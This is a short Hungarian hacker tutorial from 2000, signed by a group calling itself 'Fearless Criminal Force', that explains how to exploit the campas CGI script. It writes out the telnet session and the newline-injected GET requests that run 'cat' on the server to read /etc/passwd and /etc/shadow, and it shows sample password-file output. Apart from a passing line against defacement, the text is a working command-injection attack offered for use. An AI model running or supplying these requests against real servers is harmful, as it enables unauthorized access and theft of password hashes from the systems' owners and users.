Nestan - Campas exploit

 

Az exploit lényege az, és ugyebár, nem ez az utolsó?!, hogy egy telnetes parancs leadásával visszakaphatod a szerveren lévő fájlok tartalmát, persze ehhez egy acc. kell arra a bizonyos szerverre vagy anonymous (guest) hozzáférés.

Szóval simán betelnetelsz az illetékes szerverre (rákerestem az AltaVista.Com-on a url:/cgi-bin/campas illetve url:campas -ra is, de sajnos csak egyetlen egy találat volt, valamilyen német egyetem... mind1), tehát:

telnet www.xxxx.net 80

    Trying 200.xx.xx.xx...
    Connected to venus.xxxx.net
    Escape character is '^]'.

GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

  root:x:0:1:Super-User:/export/home/root:/sbin/sh
  daemon:x:1:1::/:
  bin:x:2:2::/usr/bin:
  sys:x:3:3::/:
  adm:x:4:4:Admin:/var/adm:
  lp:x:71:8:Line Printer Admin:/usr/spool/lp:
  smtp:x:0:0:Mail Daemon User:/:/bin/false
Tehát ennyi az egész ;-) Ha a passwd fájl shadowolt, akkor próbáljuk meg leadni a:
GET /cgi-bin/campas?%0acat%0a/etc/shadow%0a
GET /cgi-bin/campas?%0acat%0a/etc/shadow-%0a
Parancsokat... nekem bejött. Persze ne deface-re használjuk ezeket a dolgokat...

 

 

Nestan [FCF] mailto: nestan@freemail.hu

·

Külön köszönet a segítségért az alábbiaknak: Formater, RSC

©2000. Fearless Criminal Force.